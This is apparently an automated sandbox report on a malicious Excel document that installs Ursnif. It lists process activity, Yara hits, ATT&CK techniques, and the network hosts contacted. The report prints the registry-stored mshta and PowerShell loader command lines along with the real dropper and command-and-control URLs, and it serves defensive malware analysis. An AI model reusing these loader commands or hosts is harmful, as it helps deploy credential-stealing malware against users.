                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                  Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\zctvvvtu\zctvvvtu.cmdline'
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a2r2fkec\a2r2fkec.cmdline'
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: unknown unknown
                  Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Copx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Copx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                  Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Hl1h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Hl1h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
                  Source: Yara matchFile source: app.xml, type: SAMPLE
                  Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmpBinary or memory string: Program Manager
                  Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                  Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmpBinary or memory string: Progman
                  Source: regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E4454 cpuid
                  Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E6B0F HeapCreate,GetTickCount,GetSystemTimeAsFileTime,SwitchToThread,_aullrem,Sleep,IsWow64Process,
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E4454 wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,
                  Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_001E4C1B CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                  Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif
Source: Yara match | File source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif
Source: Yara match | File source: 19.3.regsvr32.exe.56b94a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.3.regsvr32.exe.4d894a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000013.00000003.508793933.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508759247.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508819476.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411957077.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508778168.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411794580.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411858229.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411885260.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.472132410.0000000004B0E000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.531333562.000000000553C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508710785.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411972809.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.429184025.0000000004C0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.428651984.0000000004D89000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.520271501.00000000056B9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508809489.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411764136.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411824879.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508736134.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000003.508679200.0000000005738000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000003.411905435.0000000004E08000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 5236, type: MEMORY

MITRE ATT&CK Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 2 | DLL Side-Loading 1 | DLL Side-Loading 1 | Obfuscated Files or Information 1 | OS Credential Dumping | System Time Discovery 1 | Remote Services | Archive Collected Data 11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer 3 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1
Default Accounts | Native API 2 | Boot or Logon Initialization Scripts | Process Injection 12 | DLL Side-Loading 1 | LSASS Memory | Account Discovery 1 | Remote Desktop Protocol | Email Collection 1 | Exfiltration Over Bluetooth | Encrypted Channel 22 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | Exploitation for Client Execution 4 | Logon Script (Windows) | Logon Script (Windows) | Masquerading 1 | Security Account Manager | File and Directory Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | Command and Scripting Interpreter 1 | Logon Script (Mac) | Logon Script (Mac) | Virtualization/Sandbox Evasion 21 | NTDS | System Information Discovery 36 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 4 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | PowerShell 1 | Network Logon Script | Network Logon Script | Process Injection 12 | LSA Secrets | Query Registry 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Regsvr32 1 | Cached Domain Credentials | Virtualization/Sandbox Evasion 21 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | Process Discovery 3 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | Application Window Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | System Owner/User Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction

Behavior Graph

Behavior Graph ID: 445916 | Sample: documentation_39236.xlsb | Startdate: 08/07/2021 | Architecture: WINDOWS | Score: 100

The graph itself is an image in the original report; the nodes and edges it shows are:

Root signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Multi AV Scanner detection for domain / URL; Found malware configuration; 10 other signatures
Root starts: EXCEL.EXE; iexplore.exe; mshta.exe; 2 other processes

EXCEL.EXE
  - contacts free.mynowministries.com (162.241.253.78, ports 443, 49725, 49752; UNIFIEDLAYER-AS-1US, United States)
  - drops C:\Users\user\AppData\Local\...\app[1].dll (PE32) and C:\Users\Public\Documents\decrypt.dll (PE32)
  - signatures: Document exploit detected (creates forbidden files); Document exploit detected (UrlDownloadToFile)
  - starts regsvr32.exe (two instances)
    - regsvr32.exe signatures: Writes or reads registry keys via WMI; Writes registry values via WMI

iexplore.exe
  - starts iexplore.exe (four instances)

mshta.exe
  - signature: Suspicious powershell command line found
  - starts powershell.exe
    - drops C:\Users\user\AppData\...\zctvvvtu.cmdline (UTF-8)
    - starts conhost.exe and csc.exe

2 other processes
  - start iexplore.exe, which contacts gtr.antoinfer.com (165.232.183.49, ports 49754, 49755, 49756; ALLEGHENYHEALTHNETWORKUS, United States)
  - start powershell.exe, which starts conhost.exe and csc.exe


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
3.2.regsvr32.exe.1e0000.1.unpack | 100% | Avira | HEUR/AGEN.1108168
19.2.regsvr32.exe.fb0000.1.unpack | 100% | Avira | HEUR/AGEN.1108168

Domains

Source | Detection | Scanner
gtr.antoinfer.com | 8% | Virustotal

URLs

Source | Detection | Scanner | Label
http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIH | 0% | Avira URL Cloud | safe
https://cdn.entity. | 0% | URL Reputation | safe
http://gtr.antoinfer.com/k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk | 0% | Avira URL Cloud | safe
https://powerlift.acompli.net | 0% | URL Reputation | safe
https://rpsticket.partnerservices.getmicrosoftkey.com | 0% | URL Reputation | safe
https://cortana.ai | 0% | URL Reputation | safe
http://gtr.antoinfer.com/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2F | 0% | Avira URL Cloud | safe
http://gtr.antoinfer.com/xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUV | 0% | Avira URL Cloud | safe
https://api.aadrm.com/ | 0% | URL Reputation | safe
https://ofcrecsvcapi-int.azurewebsites.net/ | 0% | Avira URL Cloud | safe
http://gtr.antoinfer.com/favicon.ico | 0% | Avira URL Cloud | safe
http://gtr.antoinfer.com/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2FfIBHwVISTOJqyyE/yxzQpB4UhTtBihgn/15wt67RuhdWC2bp/AA4QTb7hSSc7ibwOLz/pdYBrbn9P/IhNkxf132wscOBr5M107/x3K_2BnAOaEK3ZrGH_2/BhQbh5Iq3KL0HGqeYocdUa/aitTSocVb3Ei8/K8Yn7wxH/8ZzNnAARdlf1lpPkD_2FTSI/88hMX1xgXx/WKheFQm4ijbivR_2F/Zqk2tiAD1SrE/7_2FLrw5q4N/ROSXMe9TmWNzIt/lpE2Vas7vRgwYKuDJRzfN/M8anWcq | 0% | Avira URL Cloud | safe
http://gtr.antoinfer.com/IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/ | 0% | Avira URL Cloud | safe
https://res.getmicrosoftkey.com/api/redemptionevents | 0% | URL Reputation | safe
https://powerlift-frontdesk.acompli.net | 0% | URL Reputation | safe
https://officeci.azurewebsites.net/api/ | 0% | Avira URL Cloud | safe
https://free.mynowministries.com/app.dll | 0% | Avira URL Cloud | safe
http://gtr.antoinfer.com/MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLx | 0% | Avira URL Cloud | safe
https://store.office.cn/addinstemplate | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gare | 0% | Avira URL Cloud | safe
https://store.officeppe.com/addinstemplate | 0% | URL Reputation | safe
https://dev0-api.acompli.net/autodetect | 0% | URL Reputation | safe
https://www.odwebp.svc.ms | 0% | URL Reputation | safe
https://dataservice.o365filtering.com/ | 0% | URL Reputation | safe
https://officesetup.getmicrosoftkey.com | 0% | URL Reputation | safe
https://prod-global-autodetect.acompli.net/autodetect | 0% | URL Reputation | safe
https://ncus.contentsync. | 0% | URL Reputation | safe
https://apis.live.net/v5.0/ | 0% | URL Reputation | safe
https://wus2.contentsync. | 0% | URL Reputation | safe
http://gtr.antoinfer.com/k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk5Ykbc8d/ir2ifxTr4LNwVXB57AO/naMzNC0NRqAZpafqf_2BA_/2Be4kMQ_2Bs4v/p3vimkya/tnJRXZOQhgPrD4eJIIoOBmz/6_2FqS0VmH/GdEp4ZZJMOcj3fIll/Gr7XyTEKPabp/aWzveP_2B5R/CbkrZ6KMbYewce/4JBfvb8ftJcY5XJZOep1x/uKyVwvTYfdKUGuNG/Emm_2BOgQKRpwFp/DFm1TypwhIB6euZx4o/ZnwoOdebK/P2zkNdJ1mC1FOPRaBbHj/tGtvylAtqDtqZZGz2/K | 0% | Avira URL Cloud | safe
https://asgsmsproxyapi.azurewebsites.net/ | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
gtr.antoinfer.com | 165.232.183.49 | true | true | | unknown
free.mynowministries.com | 162.241.253.78 | true | false | | unknown

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://gtr.antoinfer.com/favicon.ico | true | Avira URL Cloud: safe | unknown
http://gtr.antoinfer.com/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2FfIBHwVISTOJqyyE/yxzQpB4UhTtBihgn/15wt67RuhdWC2bp/AA4QTb7hSSc7ibwOLz/pdYBrbn9P/IhNkxf132wscOBr5M107/x3K_2BnAOaEK3ZrGH_2/BhQbh5Iq3KL0HGqeYocdUa/aitTSocVb3Ei8/K8Yn7wxH/8ZzNnAARdlf1lpPkD_2FTSI/88hMX1xgXx/WKheFQm4ijbivR_2F/Zqk2tiAD1SrE/7_2FLrw5q4N/ROSXMe9TmWNzIt/lpE2Vas7vRgwYKuDJRzfN/M8anWcq | true | Avira URL Cloud: safe | unknown
http://gtr.antoinfer.com/k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk5Ykbc8d/ir2ifxTr4LNwVXB57AO/naMzNC0NRqAZpafqf_2BA_/2Be4kMQ_2Bs4v/p3vimkya/tnJRXZOQhgPrD4eJIIoOBmz/6_2FqS0VmH/GdEp4ZZJMOcj3fIll/Gr7XyTEKPabp/aWzveP_2B5R/CbkrZ6KMbYewce/4JBfvb8ftJcY5XJZOep1x/uKyVwvTYfdKUGuNG/Emm_2BOgQKRpwFp/DFm1TypwhIB6euZx4o/ZnwoOdebK/P2zkNdJ1mC1FOPRaBbHj/tGtvylAtqDtqZZGz2/K | true | Avira URL Cloud: safe | unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005 | csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | false | | high
https://api.diagnosticssdf.office.com | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://login.microsoftonline.com/ | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://shell.suite.office.com:1443 | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIH | {7879BAAC-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr | true | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200 | csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | false | | high
https://autodiscover-s.outlook.com/ | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://cdn.entity. | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | URL Reputation: safe (x4) | unknown
http://gtr.antoinfer.com/k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk | {7879BAA6-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DFA7B5BF1FB774EA36.TMP.28.dr | true | Avira URL Cloud: safe | unknown
https://api.addins.omex.office.net/appinfo/query | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://clients.config.office.net/user/v1.0/tenantassociationkey | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/ | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://powerlift.acompli.net | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | URL Reputation: safe (x4) | unknown
https://rpsticket.partnerservices.getmicrosoftkey.com | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | URL Reputation: safe (x4) | unknown
https://lookup.onenote.com/lookup/geolocation/v1 | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://cortana.ai | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | URL Reputation: safe (x4) | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince | csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp | false | | high
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
http://gtr.antoinfer.com/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2F | {5DCD6FF8-E03E-11EB-90E4-ECF4BB862DED}.dat.23.dr, ~DF99BD870E81A4914B.TMP.23.dr | true | Avira URL Cloud: safe | unknown
http://gtr.antoinfer.com/xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUV | {7879BAA4-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DF436C4ACF406520B7.TMP.28.dr | true | Avira URL Cloud: safe | unknown
https://cloudfiles.onenote.com/upload.aspx | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://entitlement.diagnosticssdf.office.com | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy | 3A4E1985-998D-4759-B374-77BB71813A62.1.dr | false | | high
